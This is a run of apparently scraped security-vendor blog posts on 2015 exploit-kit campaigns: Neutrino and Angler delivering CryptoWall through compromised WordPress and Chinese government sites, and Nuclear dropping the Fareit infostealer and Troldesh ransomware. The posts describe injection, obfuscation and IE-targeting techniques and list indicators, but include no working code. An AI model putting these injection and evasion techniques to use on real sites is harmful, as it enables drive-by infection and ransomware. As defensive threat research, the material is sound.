Neutrino Campaign Leveraging WordPress, Flash For CryptoWall

Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and continues to remain active and incorporate new exploits. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we’ve seen a massive uptick in the use of the kit. The cause for this uptick appears due to widespread WordPress site compromises.
ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.
Fig 1. Complete Neutrino WordPress campaign
In analyzing the infection cycle, there are multiple recent changes in the Neutrino code, some that are normally characteristics of Angler Exploit Kit, but others that remain unique to Neutrino.
WordPress Compromises
Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, we have seen over 2600 unique WordPress sites being used in this campaign where more than 4200 distinct pages have been logged with dynamic iframe injection in the last month. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.
Fig 2. Event timeline overview
The goal of this campaign is to completely and fully compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare these recent Neutrino and Angler samples below.
Fig 3. Neutrino on the left, Angler on the right
The code specifically targets Internet Explorer, so those using other browsers won’t be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.
The actual Neutrino landing pages are retrieved on the backend through the injected php code, a sample of which is below:
Fig 4. Injected php code
Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
This URL is used to retrieve an updated landing page URL, and we’ve noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is ‘’ which is owned by We reached out to them via email briefly explaining what we were seeing and received no response.
Neutrino Landing Page
The landing page has been updated and contains some JavaScript that only declares variables, and then a flash loader:
Fig 5. Neutrino landing page
If flash isn’t installed on the victim machine, an old flash cab is pushed to the user prior to serving the malicious SWF. Note the departure from using base64 encoded data blobs, or really using very much code at all on the landing page.
Neutrino SWF
Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:
Fig 6. SWF structure
Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:
Fig 7. Decode function for embedded SWF
Detection results for the SWF are very poor with only one vendor detecting it:
Fig 8. Poor detection results on SWF
Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:
Fig 9. Binary data inside embedded SWF
Fig 10. Script data inside embedded SWF – characteristic of Neutrino
These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O’Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:
Fig 11. Decoder for one binarydata ‘exploitWrapper’ blob
Detection on the embedded SWF is also quite poor.
Fig 12. Embedded SWF VT detection
Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:
Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample
Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar ‘HELP_DECRYPT’ page and see connections out to the payment servers:
Fig 15. Payment server connections
Fig 16. CryptoWall 3.0 HELP_DECRYPT page
To read more about CryptoWall, please see our previous writeup here.
Campaign Information
As stated, the primary IP for the observed Neutrino landing pages is ‘’ which is owned by Many of the domains pointing to that IP utilize ‘xyz’, ‘ga’, ‘gq’, and ‘ml’ TLDs. Taking a look at the whois data for some of these domains, a common attribute seems to be the name ‘Max Vlapet’ for .XYZ domains. Full whois domain sample for completeness:
Domain Name: MOHGROUP.XYZ 
Domain ID: D9543161-CNIC 
WHOIS Server: 
Referral URL: 
Updated Date: 2015-08-18T08:34:04.0Z 
Creation Date: 2015-08-18T08:34:03.0Z 
Registry Expiry Date: 2016-08-18T23:59:59.0Z 
Sponsoring Registrar: AlpNames Limited 
Sponsoring Registrar IANA ID: 1857 
Domain Status: clientTransferProhibited 
Domain Status: serverTransferProhibited 
Domain Status: addPeriod 
Registrant ID: ALP_44867689 
Registrant Name: Max Vlapet 
Registrant Organization: N/A 
Registrant Street: Mausoleum str, pl.13 
Registrant City: Moscow 
Registrant State/Province: Moscow 
Registrant Postal Code: 123006 
Registrant Country: RU 
Registrant Phone: +7.4959826524 
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: 
Admin ID: ALP_44867689 
Admin Name: Max Vlapet 
Admin Organization: N/A 
Admin Street: Mausoleum str, pl.13 
Admin City: Moscow 
Admin State/Province: Moscow 
Admin Postal Code: 123006 
Admin Country: RU 
Admin Phone: +7.4959826524 
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: 
Tech ID: ALP_44867689 
Tech Name: Max Vlapet 
Tech Organization: N/A 
Tech Street: Mausoleum str, pl.13 
Tech City: Moscow 
Tech State/Province: Moscow 
Tech Postal Code: 123006 
Tech Country: RU 
Tech Phone: +7.4959826524 
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: 
Name Server: NS2.MOHGROUP.XYZ 
Name Server: NS1.MOHGROUP.XYZ 
DNSSEC: unsigned 
Billing ID: ALP_44867689 
Billing Name: Max Vlapet 
Billing Organization: N/A 
Billing Street: Mausoleum str, pl.13 
Billing City: Moscow 
Billing State/Province: Moscow 
Billing Postal Code: 123006 
Billing Country: RU 
Billing Phone: +7.4959826524 
Billing Phone Ext: 
Billing Fax: 
Billing Fax Ext: 
Billing Email: 
>>> Last update of WHOIS database: 2015-08-19T00:44:12.0Z < Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine. A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin: Conclusion WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals.  WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena. ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.   Acknowledgement Special thanks to Dhruval Gandhi for profiling compromised WordPress sites Write-up by: John Mancuso, Deepen Desai  

Link: https://www.zscaler.com

An Update On Nuclear (Reverse) Engineering

Although Angler continues to be the leading exploit kit, Nuclear is a significant threat to web surfers and seems to have been very active lately. ThreatLabZ recently encountered a Nuclear campaign originating from a variety of compromised sites. These compromises continue the trend of WordPress sites serving malcode, and in this case included the web-presence of a UK-based healthcare organization.
Example of recent Nuclear landing page to exploit cycle
The execution flow of this campaign is typical: an infected site includes an embedded iframe that loads the exploit kit landing page. The landing page checks the browser family and version and tests the available Flash version before choosing one of several exploit payloads. From here, multiple possible payloads may be downloaded, particularly Fareit Infostealer Trojan and Troldesh Ransomware Trojan.
Nuclear Landing
As covered recently, WordPress continues to be one of the most effective traffic sources for exploit kits. However, the majority of traffic we have seen does not feature the visitorTracker component, but merely includes a hidden iframe in the footer of the WordPress page.
The malicious iframe is preceded by a large number of blank lines
The iframe loads the landing page, which features obfuscated JavaScript and random-looking text blocks. It turns out that some of the random looking text blocks are actually obfuscated components that the JavaScript eventually deobfuscates and executes.
Lines 7 and 9 are overlaid with the script invocations that decode the HTML blocks
Nuclear Exploit Payloads
The landing pages we evaluated led to two possible Flash exploits as well as one Internet Explorer exploit. Specifically, we saw CVE-2015-5122 and CVE-2015-5560 exploits for Flash, and a highly obfuscated CVE-2014-6332 exploit for IE.
The first Flash payload stage checks Flash Player version and prepares the appropriate exploit
As noted by Kafeine, Nuclear has integrated the same Diffie-Hellman Angler first pioneered, only now it is implemented in Flash to protect the CVE-2015-5560 payload. This campaign also features an XTEA function with modified constants.
A Diffie-Hellman key exchange implementation is used to protect the new Flash payload
Besides making reverse engineers lives harder, the authors have also decided to include some friendly shoutouts to those analyzing their code. In the case of the featured Flash payloads, the string “fuckAV" is used as a special constant.
This function returns an XOR key when "fuckAV" is supplied as a parameter
Nuclear Fallout
Once the browser is exploited, Nuclear first drops a Fareit payload. Fareit is an infostealer, and as can be seen in the strings below, is looking to steal user credentials for multiple applications and websites as well as BitCoin wallet information.
A sample of the files and paths Fareit checks for user credentials
While stealing users information, Fareit attempts to hide its command and control communication by sending its check-in request in the midst of a batch of HTTP requests to innocuous looking websites.
After checking connectivity on, multiple POSTs are performed
In addition to the Fareit payload, a Troldesh ransomware payload was also seen. Troldesh is yet another in the line of ransomware families that encrypt user files and attempt to extract a ransom payments in exchange for decryption keys. This campaign is using the email addresses files100005(at) and files100006(at) and the Tor address a4yhexpmth2ldj3v.onion.
Troldesh bundles a Tor proxy to protect its communication
Although they might prefer to infect the machines of non-analysts, the Troldesh author does take the opportunity to greet their reverse engineer friends. This message is less aggressive than the greeting in the Nuclear flash payload.
Thanks, but I don’t drink coffee!
While Nuclear may not be the exploit kit that regularly debuts the latest advances, the authors certainly make an effort to keep up with new exploits and new obfuscation techniques. ThreatLabZ will continue to monitor Nuclear (and Fareit and Troldesh) for any new developments or greetings.
Recent landing page IP addresses
Recent landing page hostnames
Recent compromised sites and redirectors

Link: https://www.zscaler.com

Chinese Government Website Compromised, Leads To Angler

Despite a recent takedown targeting the Angler Exploit Kit (EK), it’s back to business as usual for kit operators. On 30-October-2015, ThreatLabZ noticed a compromised Chinese government website that led to the Angler Exploit Kit with an end payload of Cryptowall 3.0. This compromise does not appear targeted and the compromised site was cleaned up within 24 hours. We have noticed some recent changes to Angler, as well as the inclusion of newer Flash exploits. A set of indicators for this compromise is at the end of this post.
Compromised Site
The “Chuxiong Archives" website, www.cxda[.], was compromised with injected code. The site has a similar look and feel to both the Chuxiong Yi Prefecture and Chuxiong City websites and appears somewhat inactive, but surprisingly the site was remediated in less than 24 hours. The full infection cycle from compromised site to encrypted payload is shown in the fiddler session below.
Fig 1. Infection cycle
The injected code was before the opening HTML tag and was heavily obfuscated. The code, shown below, is very similar to other recent compromises we’ve observed and was present on every page of the site, suggesting a complete site compromise.
Fig 2. Injected script
Consistent with other recent examples, the injected code appears to target Internet Explorer (IE) since Firefox and Chrome consistently throw errors when attempting to execute the code and no redirection occurs. IE has no issues executing the code, however, which unsurprisingly decodes to an iframe leading to an Angler EK landing page:
Fig 3. Decoded injected code
While we did not have access to the server-side code, it likely retrieves landing page URLs from a remote server since we observed iframes leading to multiple different Angler domains within a brief period of time.
Landing Page
The landing page for Angler is immediately recognizable, but with some notable recent changes. For example, instead of using a long block of around seven-character long strings inside divs tag, the newer landing pages use ‘li’ tags and most of the strings are only about two characters long. Additionally, there’s a conspicuous ‘triggerApi’ function toward the top of the main script block:
Fig 4: Short strings and triggerApi function
Outside of these changes, the functionality of the landing page appears unchanged, and the goal is naturally to serve up a malicious SWF:
Fig 5. Decoded landing page SWF objects
Malicious SWF – CVE-2015-7645
Kafeine already broke the news that Angler is exploiting Flash, and we can corroborate that with the samples we’ve observed.
Fig 6. Flash being exploited
In fact, we compared the sample from his recent post with one obtained from this infection and the structure is identical, with very few changes in the actionscript. The biggest change we saw was in the embedded binary data.
Fig 7. SWF structure, 30-Oct sample on the left, Kafeine’s sample on the right
Fig 8. Comparison of binary data, 30-Oct sample on the left, Kafeine’s sample on the right
Upon successful exploit cycle, a new CryptoWall 3.0 variant from the crypt13 campaign is downloaded and installed on the target machine. The image below shows a decrypted Command & Control (C&C) communication message from the CryptoWall variant which also contains the total number of files encrypted on the target system:
Fig 9. CryptoWall 3.0 C&C message reporting encrypted file count
Final Thoughts
As stated, this seems to be business as usual for Angler EK operators. While these attacks were not targeted in nature, this is the first instance where we saw EK operators leveraging a government site to target end users. One interesting observation is that we no longer see any Diffie-Helman POST exchange to prevent replaying captured sessions for offline analysis. Additionally, there was a much larger number of C&C servers than we’ve previously observed, and some of the domain names seem to suggest multi-use hosts (e.g.: spam, bitcoin mining, etc). Note that none of the C&C servers are pseudo-randomly generated domains. ThreatLabZ will continue to track new developments with the Angler Exploit Kit.
Indicators of Compromise
IP Address
Chinese government site
Angler Domain
Angler Domain
Payment Server
Payment Server
Payment Server
Payment Server
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections
C&C connections

Link: https://www.zscaler.com

Trojan Intercepts SMS Messages To Attack Banks In South Korea

Banks in South Korea recently started to offer customers a text messaging option to access accounts and authenticate transactions. It was reported that a major South Korea bank, KEB Hana Bank, was the first to launch the text banking service in the country on Nov 21, 2016. Unfortunately, cyber thieves have picked up on this, Read More
The post Trojan Intercepts SMS Messages To Attack Banks In South Korea appeared first on Trustlook Blog.